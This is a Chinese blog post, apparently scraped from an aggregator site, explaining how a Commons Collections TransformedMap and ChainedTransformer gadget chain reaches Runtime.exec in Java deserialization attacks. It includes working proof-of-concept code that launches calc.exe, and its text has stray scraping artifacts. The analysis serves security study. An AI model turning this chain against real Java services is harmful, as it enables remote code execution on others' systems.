java反序列化 - transformedMap类能够执行恶意代码的原理
java反序列化 - transformedMap类能够执行恶意代码的原理
0x00 代码
Map map=new HashMap();
map.put("key","value");
//调用目标对象的toString方法
String command="calc.exe";
final String[] execArgs = new String[] { command };
final Transformer[] transformers = new Transformer[] {
new ConstantTransformer(Runtime.class),
new InvokerTransformer("getMethod", new Class[] {
String.class, Class[].class }, new Object[] {
"getRuntime", new Class[0] }),
new InvokerTransformer("invoke", new Class[] {
Object.class, Object[].class }, new Object[] {
null, new Object[0] }),
new InvokerTransformer("exec",
new Class[] { String.class }, execArgs)
};
Transformer transformer=new ChainedTransformer(transformers);
Map<String, Object> transformedMap=TransformedMap.decorate(map,null,transformer);
for (Map.Entry<String,Object> entry:transformedMap.entrySet()){
System.out.println(entry);
entry.setValue("anything");
}
执行结果:
java
0x01 transformedMap类为何能够执行恶意代码?
经过上一篇https://blog.51cto.com/13770310/2160737文章, 可知ChainedTransformer的transformer方法能够执行恶意代码。
上述代码的关键是:ide
for (Map.Entry<String,Object> entry:transformedMap.entrySet()){
System.out.println(entry);
entry.setValue("anything");
}
为何执行了 entry.setValue("anything");就能够形成恶意代码执行呢?接下来咱们看transformedMap类的checkSetValue方法:code
/**
* Override to transform the value when using <code>setValue</code>.
*
* @param value the value to transform
* @return the transformed value
* @since Commons Collections 3.1
*/
protected Object checkSetValue(Object value) {
return valueTransformer.transform(value);
}
当transformedMap对象执行setValue方法时会调用valueTransformer的transform方法,若是传入的valueTransformer是ChainedTransformer的对象,那不就能够形成恶意代码执行了吗。
接着查看上面代码:
所以该代码的核心仍是使用的ChainedTransformer的transformer方法orm
相关文章
- 1. JAVA反序列化漏洞
- 2. java 反序列化 漏洞
- 3. JAVA反序列化漏洞研究
- 4. Java 反序列化漏洞原理
- 5. Java反序列化漏洞分析
- 6. Java 代码执行原理
- 7. JAVA反序列化安全
- 8. 恶意代码分析-第十一章-恶意代码行为
- 9. Java:类中代码的执行顺序
- 10. 序列化和反序列化漏洞的简单理解
- 更多相关文章...
- • Markdown 代码 - Markdown 教程
- • MyBatis的工作原理 - MyBatis教程
- • IntelliJ IDEA代码格式化设置
- • ☆技术问答集锦(13)Java Instrument原理
相关标签/搜索
每日一句
-
每一个你不满意的现在,都有一个你没有努力的曾经。
最新文章
- 1. vs2019运行opencv图片显示代码时,窗口乱码
- 2. app自动化 - 元素定位不到?别慌,看完你就能解决
- 3. 在Win8下用cisco ××× Client连接时报Reason 422错误的解决方法
- 4. eclipse快速补全代码
- 5. Eclipse中Java/Html/Css/Jsp/JavaScript等代码的格式化
- 6. idea+spring boot +mabitys(wanglezapin)+mysql (1)
- 7. 勒索病毒发生变种 新文件名将带有“.UIWIX”后缀
- 8. 【原创】Python 源文件编码解读
- 9. iOS9企业部署分发问题深入了解与解决
- 10. 安装pytorch报错CondaHTTPError:******
欢迎关注本站公众号,获取更多信息
相关文章
- 1. JAVA反序列化漏洞
- 2. java 反序列化 漏洞
- 3. JAVA反序列化漏洞研究
- 4. Java 反序列化漏洞原理
- 5. Java反序列化漏洞分析
- 6. Java 代码执行原理
- 7. JAVA反序列化安全
- 8. 恶意代码分析-第十一章-恶意代码行为
- 9. Java:类中代码的执行顺序
- 10. 序列化和反序列化漏洞的简单理解